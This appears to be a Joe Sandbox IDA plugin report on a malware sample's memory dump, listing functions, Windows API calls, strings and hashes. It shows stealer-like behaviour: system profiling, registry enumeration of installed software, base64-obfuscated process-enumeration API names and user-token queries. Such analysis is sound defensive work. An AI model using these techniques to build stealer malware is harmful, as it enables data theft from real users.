GetProcAddress.KERNEL32(00000000,00000000), ref: 004097D0
GetProcAddress.KERNEL32(00000000,00000000), ref: 004097EA
GetProcAddress.KERNEL32(00000000,00000000), ref: 00409804
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040981E
GetProcAddress.KERNEL32(00000000,00000000), ref: 00409838
GetProcAddress.KERNEL32(00000000,00000000), ref: 00409852
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040986C
GetProcAddress.KERNEL32(00000000,00000000), ref: 00409886
GetProcAddress.KERNEL32(00000000,00000000), ref: 004098A0
GetProcAddress.KERNEL32(00000000,00000000), ref: 004098BA

Strings

%appdata%\2fda\, xrefs: 004096EF
PATH, xrefs: 00409724
%TEMP%\2fda\, xrefs: 004096A1

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: AddressProc$CreateDirectory$AllocLibraryLoadString
String ID: %TEMP%\2fda\$%appdata%\2fda\$PATH
API String ID: 763169861-1556614757
Opcode ID: 3dabca578a80f5a72b4bbe57d97a85dc37324ae0374c3875346d0a4ab4ac3a91
Instruction ID: 26d77c896aabed61a2775ccb06ba61d1ee422efe4d6d96ca95dbfc380ed6e43d
Opcode Fuzzy Hash: 3dabca578a80f5a72b4bbe57d97a85dc37324ae0374c3875346d0a4ab4ac3a91
Instruction Fuzzy Hash: DA91D9B06402049FD712EF69D885B9A37E8BF4A349F00847AF404EB7A6C778AD44CB5D

Function 00409664 Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 230libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00403C18: SysReAllocStringLen.OLEAUT32(?,00406C70,00000002), ref: 00403C2E

CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6,?,?), ref: 004096BF
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6), ref: 0040970D
LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6,?,?,?), ref: 00409762
GetProcAddress.KERNEL32(00000000,00000000), ref: 00409782
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040979C
GetProcAddress.KERNEL32(00000000,00000000), ref: 004097B6
GetProcAddress.KERNEL32(00000000,00000000), ref: 004097D0
GetProcAddress.KERNEL32(00000000,00000000), ref: 004097EA
GetProcAddress.KERNEL32(00000000,00000000), ref: 00409804
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040981E
GetProcAddress.KERNEL32(00000000,00000000), ref: 00409838
GetProcAddress.KERNEL32(00000000,00000000), ref: 00409852
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040986C
GetProcAddress.KERNEL32(00000000,00000000), ref: 00409886
GetProcAddress.KERNEL32(00000000,00000000), ref: 004098A0
GetProcAddress.KERNEL32(00000000,00000000), ref: 004098BA

Strings

%appdata%\2fda\, xrefs: 004096EF
PATH, xrefs: 00409724
%TEMP%\2fda\, xrefs: 004096A1

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: AddressProc$CreateDirectory$AllocLibraryLoadString
String ID: %TEMP%\2fda\$%appdata%\2fda\$PATH
API String ID: 763169861-1556614757
Opcode ID: a16eaeec054c51931e14f5265a1c09e3020d9e051cf30a86899ec13f16d3cac9
Instruction ID: 5b3c55801863a32800eae0c5f30943bce4d4c5d0b2659c2e20ef893ba67f7cd3
Opcode Fuzzy Hash: a16eaeec054c51931e14f5265a1c09e3020d9e051cf30a86899ec13f16d3cac9
Instruction Fuzzy Hash: A991E8B06402049FD711EF69D885F9A37E8BF49349F00847AB404EB7A6C778AD44CB9D

Function 00409668 Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 228libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00403C18: SysReAllocStringLen.OLEAUT32(?,00406C70,00000002), ref: 00403C2E

CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6,?,?), ref: 004096BF
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6), ref: 0040970D
LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6,?,?,?), ref: 00409762
GetProcAddress.KERNEL32(00000000,00000000), ref: 00409782
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040979C
GetProcAddress.KERNEL32(00000000,00000000), ref: 004097B6
GetProcAddress.KERNEL32(00000000,00000000), ref: 004097D0
GetProcAddress.KERNEL32(00000000,00000000), ref: 004097EA
GetProcAddress.KERNEL32(00000000,00000000), ref: 00409804
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040981E
GetProcAddress.KERNEL32(00000000,00000000), ref: 00409838
GetProcAddress.KERNEL32(00000000,00000000), ref: 00409852
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040986C
GetProcAddress.KERNEL32(00000000,00000000), ref: 00409886
GetProcAddress.KERNEL32(00000000,00000000), ref: 004098A0
GetProcAddress.KERNEL32(00000000,00000000), ref: 004098BA

Strings

%appdata%\2fda\, xrefs: 004096EF
PATH, xrefs: 00409724
%TEMP%\2fda\, xrefs: 004096A1

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: AddressProc$CreateDirectory$AllocLibraryLoadString
String ID: %TEMP%\2fda\$%appdata%\2fda\$PATH
API String ID: 763169861-1556614757
Opcode ID: ce2ff15e378b2bb7b4fef2ac6f55289aba182e4e6d2a742e5fc03b537afcb1c4
Instruction ID: 26c99af69019636de113f168175dae5416f6f3cc59ad43c6f3cb6d4c520b39b5
Opcode Fuzzy Hash: ce2ff15e378b2bb7b4fef2ac6f55289aba182e4e6d2a742e5fc03b537afcb1c4
Instruction Fuzzy Hash: A191D7B06402049FD711EF69D885F9A77E8BF49349F00847AB404EB7A6C778AD44CB9D

Function 00416974 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 213sleepCOMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 00416AD3
GetSystemMetrics.USER32(00000001), ref: 00416AEA

Part of subcall function 00415E44: GetSystemInfo.KERNEL32(0041985E,00000000,00415FD0,?,?,00000000,00000000,?,00416B89,?,,?,Zone: ,?,00416CA4,?), ref: 00415E68

Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,00416CA4,?,LocalTime: ,?,00416CA4,?,Layouts: ,?), ref: 00416B9F

Part of subcall function 00416290: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,,?,?,), ref: 00416300
Part of subcall function 00416290: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416306
Part of subcall function 00416290: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,), ref: 0041632E
Part of subcall function 00416290: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416334
Part of subcall function 00416290: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE), ref: 00416373
Part of subcall function 00416290: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416379

Sleep.KERNEL32(00000001,00416CA4,00416CA4,?,?,00000001,,?,?,,?,Zone: ,?,00416CA4,?,LocalTime: ), ref: 00416BC9
Sleep.KERNEL32(00000001,00416CA4,[Soft],?,00000001,00416CA4,00416CA4,?,?,00000001,,?,?,,?,Zone: ), ref: 00416BE8

Part of subcall function 0041564C: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A212,00000000,00415B6E,?,-00000001,?,?,00000000,00000000,?,00416BF5,00000001), ref: 004156A9
Part of subcall function 0041564C: RegEnumKeyA.ADVAPI32(0041A212,00000000,?,000003E9), ref: 00415831
Part of subcall function 0041564C: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A212,0041A212,00000001,?,000003E9,),?,?,00000000,00415C44,?,?), ref: 0041586C
Part of subcall function 0041564C: RegEnumKeyA.ADVAPI32(0041A212,00000000,?,000003E9), ref: 004159F4

Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07

Strings

Layouts: , xrefs: 00416B18
Screen: , xrefs: 00416AB9
MachineID : , xrefs: 004169AC
Computer(Username) : , xrefs: 00416A60
EXE_PATH : , xrefs: 004169CF
LocalTime: , xrefs: 00416B3B
Zone: , xrefs: 00416B5E
[Soft], xrefs: 00416BD0
, xrefs: 004169E1, 00416B6E, 00416B8C
Windows : , xrefs: 004169F4

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
API String ID: 75899496-943277980
Opcode ID: 1e0d2bca87e35f6c7b5bfd10e8e1d34c57de75989c9a859d105590bcafdd4c62
Instruction ID: 772785f2c09445a84a7b2349d24cb582ce7330fa6bd2b57fe2dee83489952c98
Opcode Fuzzy Hash: 1e0d2bca87e35f6c7b5bfd10e8e1d34c57de75989c9a859d105590bcafdd4c62
Instruction Fuzzy Hash: C8812C70A40209ABCB01FFA1DC42BCDBB79EF49309F61807BB104B6196D67DEA458B59

Function 00416978 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 211sleepCOMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 00416AD3
GetSystemMetrics.USER32(00000001), ref: 00416AEA

Part of subcall function 00415E44: GetSystemInfo.KERNEL32(0041985E,00000000,00415FD0,?,?,00000000,00000000,?,00416B89,?,,?,Zone: ,?,00416CA4,?), ref: 00415E68

Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,00416CA4,?,LocalTime: ,?,00416CA4,?,Layouts: ,?), ref: 00416B9F

Part of subcall function 00416290: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,,?,?,), ref: 00416300
Part of subcall function 00416290: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416306
Part of subcall function 00416290: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,), ref: 0041632E
Part of subcall function 00416290: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416334
Part of subcall function 00416290: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE), ref: 00416373
Part of subcall function 00416290: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416379

Sleep.KERNEL32(00000001,00416CA4,00416CA4,?,?,00000001,,?,?,,?,Zone: ,?,00416CA4,?,LocalTime: ), ref: 00416BC9
Sleep.KERNEL32(00000001,00416CA4,[Soft],?,00000001,00416CA4,00416CA4,?,?,00000001,,?,?,,?,Zone: ), ref: 00416BE8

Part of subcall function 0041564C: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A212,00000000,00415B6E,?,-00000001,?,?,00000000,00000000,?,00416BF5,00000001), ref: 004156A9
Part of subcall function 0041564C: RegEnumKeyA.ADVAPI32(0041A212,00000000,?,000003E9), ref: 00415831
Part of subcall function 0041564C: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A212,0041A212,00000001,?,000003E9,),?,?,00000000,00415C44,?,?), ref: 0041586C
Part of subcall function 0041564C: RegEnumKeyA.ADVAPI32(0041A212,00000000,?,000003E9), ref: 004159F4

Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07

Strings

Layouts: , xrefs: 00416B18
Screen: , xrefs: 00416AB9
MachineID : , xrefs: 004169AC
Computer(Username) : , xrefs: 00416A60
EXE_PATH : , xrefs: 004169CF
LocalTime: , xrefs: 00416B3B
Zone: , xrefs: 00416B5E
[Soft], xrefs: 00416BD0
, xrefs: 004169E1, 00416B6E, 00416B8C
Windows : , xrefs: 004169F4

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
API String ID: 75899496-943277980
Opcode ID: 59511fbf5850ea39f7a97e4ece4a07d480cd8920ed0554feb4cc531c0111e1d0
Instruction ID: ba9566fa5802b655d19b309e0ce3e7f0f20b9e85fb6ad6d3dc3daba04cc241c3
Opcode Fuzzy Hash: 59511fbf5850ea39f7a97e4ece4a07d480cd8920ed0554feb4cc531c0111e1d0
Instruction Fuzzy Hash: 70811D70A40209ABCB01FFA1DC42BCDBB79EF45309F61807BB104B61D6D67DEA458B59

Function 0041698C Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 201sleepCOMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 00416AD3
GetSystemMetrics.USER32(00000001), ref: 00416AEA

Part of subcall function 00415E44: GetSystemInfo.KERNEL32(0041985E,00000000,00415FD0,?,?,00000000,00000000,?,00416B89,?,,?,Zone: ,?,00416CA4,?), ref: 00415E68

Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,00416CA4,?,LocalTime: ,?,00416CA4,?,Layouts: ,?), ref: 00416B9F

Part of subcall function 00416290: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,,?,?,), ref: 00416300
Part of subcall function 00416290: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416306
Part of subcall function 00416290: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,), ref: 0041632E
Part of subcall function 00416290: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416334
Part of subcall function 00416290: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE), ref: 00416373
Part of subcall function 00416290: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416379

Sleep.KERNEL32(00000001,00416CA4,00416CA4,?,?,00000001,,?,?,,?,Zone: ,?,00416CA4,?,LocalTime: ), ref: 00416BC9
Sleep.KERNEL32(00000001,00416CA4,[Soft],?,00000001,00416CA4,00416CA4,?,?,00000001,,?,?,,?,Zone: ), ref: 00416BE8

Part of subcall function 0041564C: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A212,00000000,00415B6E,?,-00000001,?,?,00000000,00000000,?,00416BF5,00000001), ref: 004156A9
Part of subcall function 0041564C: RegEnumKeyA.ADVAPI32(0041A212,00000000,?,000003E9), ref: 00415831
Part of subcall function 0041564C: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A212,0041A212,00000001,?,000003E9,),?,?,00000000,00415C44,?,?), ref: 0041586C
Part of subcall function 0041564C: RegEnumKeyA.ADVAPI32(0041A212,00000000,?,000003E9), ref: 004159F4

Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07

Strings

Layouts: , xrefs: 00416B18
Screen: , xrefs: 00416AB9
MachineID : , xrefs: 004169AC
Computer(Username) : , xrefs: 00416A60
EXE_PATH : , xrefs: 004169CF
LocalTime: , xrefs: 00416B3B
Zone: , xrefs: 00416B5E
[Soft], xrefs: 00416BD0
, xrefs: 004169E1, 00416B6E, 00416B8C
Windows : , xrefs: 004169F4

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
API String ID: 75899496-943277980
Opcode ID: 9adb7b97f0f0af6d8064e5965c4ea0affd5c9fa3dc3455625f80a323b340c98c
Instruction ID: b8284bc9f62184e4db5d5ca1727f6710c034d5e6d015895e5eeee5dd02488032
Opcode Fuzzy Hash: 9adb7b97f0f0af6d8064e5965c4ea0affd5c9fa3dc3455625f80a323b340c98c
Instruction Fuzzy Hash: 2F711C70A40109ABDF01FFE1DC42BCDBB79EF48709F61803BB104B6296D67DEA458A59

Function 00407E8C Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 100libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407FA6,?,-00000001), ref: 00407EBC
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407EC2
LoadLibraryA.KERNEL32(wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407FA6,?,-00000001), ref: 00407ED3
GetProcAddress.KERNEL32(00000000,wtsapi32.dll), ref: 00407ED9
LoadLibraryA.KERNEL32(userenv.dll,CreateEnvironmentBlock,00000000,wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407FA6,?,-00000001), ref: 00407EEA
GetProcAddress.KERNEL32(00000000,userenv.dll), ref: 00407EF0

Part of subcall function 00402754: GetModuleFileNameA.KERNEL32(00000000,?,00000105,-00000001,?,?,004195AF,?), ref: 00402778

Strings

WTSQueryUserToken, xrefs: 00407EC9
kernel32.dll, xrefs: 00407EB7
WTSGetActiveConsoleSessionId, xrefs: 00407EB2
CreateEnvironmentBlock, xrefs: 00407EE0
userenv.dll, xrefs: 00407EE5
wtsapi32.dll, xrefs: 00407ECE
D, xrefs: 00407F19

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc$FileModuleName
String ID: CreateEnvironmentBlock$D$WTSGetActiveConsoleSessionId$WTSQueryUserToken$kernel32.dll$userenv.dll$wtsapi32.dll
API String ID: 2206896924-1825016774
Opcode ID: 644b4f724dfd0b553440d3f209090e31220107d3092a367f2ae21a93c5497f88
Instruction ID: ac0e2f41aa2f423c9d9a8d80f7c11eaba859030c7a64cc794fed102b433a0b1d
Opcode Fuzzy Hash: 644b4f724dfd0b553440d3f209090e31220107d3092a367f2ae21a93c5497f88
Instruction Fuzzy Hash: 2A3139B1A44208AEDB00EBE5CC42F9EBBB8AB49704F50057AF514F71D1DA78AA058B58

Function 00407E90 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 98libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407FA6,?,-00000001), ref: 00407EBC
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407EC2
LoadLibraryA.KERNEL32(wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407FA6,?,-00000001), ref: 00407ED3
GetProcAddress.KERNEL32(00000000,wtsapi32.dll), ref: 00407ED9
LoadLibraryA.KERNEL32(userenv.dll,CreateEnvironmentBlock,00000000,wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407FA6,?,-00000001), ref: 00407EEA
GetProcAddress.KERNEL32(00000000,userenv.dll), ref: 00407EF0

Part of subcall function 00402754: GetModuleFileNameA.KERNEL32(00000000,?,00000105,-00000001,?,?,004195AF,?), ref: 00402778

Strings

WTSQueryUserToken, xrefs: 00407EC9
kernel32.dll, xrefs: 00407EB7
WTSGetActiveConsoleSessionId, xrefs: 00407EB2
CreateEnvironmentBlock, xrefs: 00407EE0
userenv.dll, xrefs: 00407EE5
wtsapi32.dll, xrefs: 00407ECE
D, xrefs: 00407F19

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc$FileModuleName
String ID: CreateEnvironmentBlock$D$WTSGetActiveConsoleSessionId$WTSQueryUserToken$kernel32.dll$userenv.dll$wtsapi32.dll
API String ID: 2206896924-1825016774
Opcode ID: e9e9c055b93d3e5757fe7b5a32e11944cabe7d6e365c66e0041facfb5e6f4819
Instruction ID: 15232c232ae21084946ce838b98eef105223b8b68f92314a8400df0ccc42bf71
Opcode Fuzzy Hash: e9e9c055b93d3e5757fe7b5a32e11944cabe7d6e365c66e0041facfb5e6f4819
Instruction Fuzzy Hash: CF313AB1A04309AEDB00EBE5CC42F9EBBECAF49704F500576F514F71D1EA78AA048B58

Function 00416290 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 225libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,,?,?,), ref: 00416300
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416306
LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,), ref: 0041632E
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416334
LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE), ref: 00416373
GetProcAddress.KERNEL32(00000000,00000000), ref: 00416379
GetCurrentProcessId.KERNEL32(?,-00000001,?,?,?,00416BAE,?,00000001,,?,?,,?,Zone: ,?,00416CA4), ref: 004164A6

Strings

a2VybmVsMzIuZGxs, xrefs: 0041635D
kernel32.dll, xrefs: 004162FB, 00416329
Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90, xrefs: 004162E5
UHJvY2VzczMyRmlyc3RX, xrefs: 00416313
UHJvY2VzczMyTmV4dFc=, xrefs: 00416341

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc$CurrentProcess
String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
API String ID: 3877065590-4127804628
Opcode ID: ca1fc72b4b2c47d8be44112ebefe3e9afb56faaddeba9d0254e414580a441eee
Instruction ID: 2c13e8732db89e5f4feef8cb650b0c3b12524099063521553718e4477c38e71b
Opcode Fuzzy Hash: ca1fc72b4b2c47d8be44112ebefe3e9afb56faaddeba9d0254e414580a441eee
Instruction Fuzzy Hash: 779185709001199BCB10EFA9C985ADEB7B9FF84304F2181BAE509B7291D739DF858F58

Function 00416288 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 216libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,,?,?,), ref: 00416300
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416306
LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,), ref: 0041632E
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416334
LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE), ref: 00416373
GetProcAddress.KERNEL32(00000000,00000000), ref: 00416379
GetCurrentProcessId.KERNEL32(?,-00000001,?,?,?,00416BAE,?,00000001,,?,?,,?,Zone: ,?,00416CA4), ref: 004164A6

Strings

a2VybmVsMzIuZGxs, xrefs: 0041635D
kernel32.dll, xrefs: 004162FB, 00416329
Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90, xrefs: 004162E5
UHJvY2VzczMyRmlyc3RX, xrefs: 00416313
UHJvY2VzczMyTmV4dFc=, xrefs: 00416341

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc$CurrentProcess
String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
API String ID: 3877065590-4127804628
Opcode ID: 758031882bcf12ba6c5acbce1a611c45e3d0127ec21c0e511c39f9a34a672d94
Instruction ID: 8191d344cd349c88f577da4185e159338671ce922f6aa283bd2b5e25c2800bc5
Opcode Fuzzy Hash: 758031882bcf12ba6c5acbce1a611c45e3d0127ec21c0e511c39f9a34a672d94
Instruction Fuzzy Hash: E091A5709001199BCB10EFA9C985ADEB7B9FF84304F1181BAE508B7291D739DF858F98

Function 0041628C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 214libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,,?,?,), ref: 00416300
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416306
LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,), ref: 0041632E
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416334
LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE), ref: 00416373
GetProcAddress.KERNEL32(00000000,00000000), ref: 00416379
GetCurrentProcessId.KERNEL32(?,-00000001,?,?,?,00416BAE,?,00000001,,?,?,,?,Zone: ,?,00416CA4), ref: 004164A6

Strings

a2VybmVsMzIuZGxs, xrefs: 0041635D
kernel32.dll, xrefs: 004162FB, 00416329
Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90, xrefs: 004162E5
UHJvY2VzczMyRmlyc3RX, xrefs: 00416313
UHJvY2VzczMyTmV4dFc=, xrefs: 00416341

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc$CurrentProcess
String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
API String ID: 3877065590-4127804628
Opcode ID: 124315a2081c9e693a39e6801378e39db6c34271a097c37f19d89fdc8cac53d3
Instruction ID: 948cc98421d4847538e10b66e82c05f92fa6bf3d8733b6e628a134da397cb227
Opcode Fuzzy Hash: 124315a2081c9e693a39e6801378e39db6c34271a097c37f19d89fdc8cac53d3
Instruction Fuzzy Hash: 8281A6709001199BCB10EF99C985ADEB7B9FF84304F1181BAE508B7291D739DF858F98

Function 0041564C Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 305registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A212,00000000,00415B6E,?,-00000001,?,?,00000000,00000000,?,00416BF5,00000001), ref: 004156A9
RegEnumKeyA.ADVAPI32(0041A212,00000000,?,000003E9), ref: 00415831
RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A212,0041A212,00000001,?,000003E9,),?,?,00000000,00415C44,?,?), ref: 0041586C
